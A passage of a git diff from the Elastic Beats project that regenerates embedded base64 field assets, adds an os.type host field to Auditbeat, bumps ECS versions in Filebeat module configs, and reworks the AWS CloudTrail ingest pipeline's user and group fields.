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" } diff --git a/x-pack/auditbeat/module/system/fields.go b/x-pack/auditbeat/module/system/fields.go index 2fc71f8ac335..24f8a73989d3 100644 --- a/x-pack/auditbeat/module/system/fields.go +++ b/x-pack/auditbeat/module/system/fields.go @@ -19,5 +19,5 @@ func init() { // AssetSystem returns asset data. // This is the base64 encoded gzipped contents of module/system. func AssetSystem() string { - return "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" + return "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" } diff --git a/x-pack/auditbeat/module/system/host/_meta/data.json b/x-pack/auditbeat/module/system/host/_meta/data.json index e0b0818dcae8..a4494027c6bd 100644 --- a/x-pack/auditbeat/module/system/host/_meta/data.json +++ b/x-pack/auditbeat/module/system/host/_meta/data.json @@ -47,6 +47,7 @@ }, "timezone.name": "UTC", "timezone.offset.sec": 0, + "type": "linux", "uptime": 18661357350265 } } diff --git a/x-pack/auditbeat/module/system/host/_meta/fields.yml b/x-pack/auditbeat/module/system/host/_meta/fields.yml index 642a3c449625..3d6ca173d83f 100644 --- a/x-pack/auditbeat/module/system/host/_meta/fields.yml +++ b/x-pack/auditbeat/module/system/host/_meta/fields.yml @@ -77,3 +77,7 @@ type: keyword description: > The operating system's kernel version. + - name: type + type: keyword + description: > + OS type (see ECS os.type). diff --git a/x-pack/auditbeat/module/system/host/host.go b/x-pack/auditbeat/module/system/host/host.go index 9aa0f7fb2e72..3a4bb38dee9c 100644 --- a/x-pack/auditbeat/module/system/host/host.go +++ b/x-pack/auditbeat/module/system/host/host.go @@ -144,6 +144,10 @@ func (host *Host) toMapStr() common.MapStr { mapstr.Put("os.codename", host.Info.OS.Codename) } + if host.Info.OS.Type != "" { + mapstr.Put("os.type", host.Info.OS.Type) + } + var ipStrings []string for _, ip := range host.Ips { ipStrings = append(ipStrings, ip.String()) @@ -362,6 +366,7 @@ func hostEvent(host *Host, eventType string, action eventAction) mb.Event { hostFields.CopyFieldsTo(hostTopLevel, "os.kernel") hostFields.CopyFieldsTo(hostTopLevel, "os.name") hostFields.CopyFieldsTo(hostTopLevel, "os.platform") + hostFields.CopyFieldsTo(hostTopLevel, "os.type") hostFields.CopyFieldsTo(hostTopLevel, "os.version") event.RootFields.Put("host", hostTopLevel) diff --git a/x-pack/auditbeat/module/system/socket/state.go b/x-pack/auditbeat/module/system/socket/state.go index 485ca4b1f1d2..369ba6705b09 100644 --- a/x-pack/auditbeat/module/system/socket/state.go +++ b/x-pack/auditbeat/module/system/socket/state.go @@ -985,11 +985,11 @@ func (f *flow) toEvent(final bool) (ev mb.Event, err error) { gid := strconv.Itoa(int(f.process.gid)) root.Put("user.id", uid) root.Put("group.id", gid) - if name := userCache.LookupUID(uid); name != "" { + if name := userCache.LookupID(uid); name != "" { root.Put("user.name", name) root.Put("related.user", []string{name}) } - if name := groupCache.LookupGID(gid); name != "" { + if name := groupCache.LookupID(gid); name != "" { root.Put("group.name", name) } metricset["uid"] = f.process.uid diff --git a/x-pack/filebeat/module/activemq/audit/config/audit.yml b/x-pack/filebeat/module/activemq/audit/config/audit.yml index 8077b2e41647..5b5cf7df03fd 100644 --- a/x-pack/filebeat/module/activemq/audit/config/audit.yml +++ b/x-pack/filebeat/module/activemq/audit/config/audit.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/activemq/log/config/log.yml b/x-pack/filebeat/module/activemq/log/config/log.yml index 1ef09c9f5043..58a8f27a0f33 100644 --- a/x-pack/filebeat/module/activemq/log/config/log.yml +++ b/x-pack/filebeat/module/activemq/log/config/log.yml @@ -13,4 +13,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/aws/cloudtrail/config/aws-s3.yml b/x-pack/filebeat/module/aws/cloudtrail/config/aws-s3.yml index 4cc64e9e561f..fc501fd47058 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/config/aws-s3.yml +++ b/x-pack/filebeat/module/aws/cloudtrail/config/aws-s3.yml @@ -66,4 +66,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/aws/cloudtrail/config/file.yml b/x-pack/filebeat/module/aws/cloudtrail/config/file.yml index 6339940d432f..8e04baa33954 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/config/file.yml +++ b/x-pack/filebeat/module/aws/cloudtrail/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/aws/cloudtrail/ingest/pipeline.yml b/x-pack/filebeat/module/aws/cloudtrail/ingest/pipeline.yml index 76cf0f936b66..c2a46c880904 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/ingest/pipeline.yml +++ b/x-pack/filebeat/module/aws/cloudtrail/ingest/pipeline.yml @@ -27,6 +27,11 @@ processors: field: "json.userIdentity.type" target_field: "aws.cloudtrail.user_identity.type" ignore_failure: true + - append: + field: related.user + value: '{{json.userIdentity.userName}}' + allow_duplicates: false + if: 'ctx.json?.userIdentity?.userName != null' - rename: field: "json.userIdentity.userName" target_field: "user.name" @@ -225,28 +230,16 @@ processors: field: "json.vpcEndpointId" target_field: "aws.cloudtrail.vpc_endpoint_id" ignore_failure: true - - script: - lang: painless - ignore_failure: true - source: >- - void addRelatedUser(def ctx, String userName) { - if (ctx.related == null) { - Map map = new HashMap(); - ctx.put("related", map); - } - if (ctx.related.user == null) { - ArrayList al = new ArrayList(); - ctx.related.put("user", al); - } - ctx.related.user.add(userName); - } - if (ctx?.aws?.cloudtrail?.flattened?.request_parameters?.userName != null) { - addRelatedUser(ctx, ctx.aws.cloudtrail.flattened.request_parameters.userName); - } - if (ctx?.aws?.cloudtrail?.flattened?.request_parameters?.newUserName != null) { - addRelatedUser(ctx, ctx.aws.cloudtrail.flattened.request_parameters.newUserName); - } - + - append: + field: related.user + value: '{{aws.cloudtrail.flattened.request_parameters.userName}}' + allow_duplicates: false + if: 'ctx.aws?.cloudtrail?.flattened?.request_parameters?.userName != null' + - append: + field: related.user + value: '{{aws.cloudtrail.flattened.request_parameters.newUserName}}' + allow_duplicates: false + if: 'ctx.aws?.cloudtrail?.flattened?.request_parameters?.newUserName != null' - script: lang: painless ignore_failure: true @@ -685,6 +678,32 @@ processors: field: "json.insightDetails" target_field: "aws.cloudtrail.insight_details" ignore_failure: true + - set: + field: group.id + value: '{{aws.cloudtrail.flattened.response_elements.group.groupId}}' + ignore_empty_value: true + ignore_failure: true + - set: + field: user.target.id + value: '{{aws.cloudtrail.flattened.response_elements.user.userId}}' + ignore_empty_value: true + ignore_failure: true + - set: + field: user.changes.name + value: '{{aws.cloudtrail.flattened.request_parameters.newUserName}}' + ignore_empty_value: true + ignore_failure: true + - set: + field: group.name + value: '{{aws.cloudtrail.flattened.request_parameters.groupName}}' + ignore_empty_value: true + ignore_failure: true + - set: + field: user.target.name + value: '{{aws.cloudtrail.flattened.request_parameters.userName}}' + ignore_empty_value: true + ignore_failure: true + - remove: field: - "json" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/add-user-to-group-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/add-user-to-group-json.log-expected.json index 2f49aa151341..50253665f083 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/add-user-to-group-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/add-user-to-group-json.log-expected.json @@ -27,9 +27,11 @@ "change" ], "fileset.name": "cloudtrail", + "group.name": "admin", "input.type": "log", "log.offset": 0, "related.user": [ + "Alice", "Bob" ], "service.type": "aws", @@ -40,6 +42,7 @@ ], "user.id": "EX_PRINCIPAL_ID", "user.name": "Alice", + "user.target.name": "Bob", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "AWSConsole" diff --git 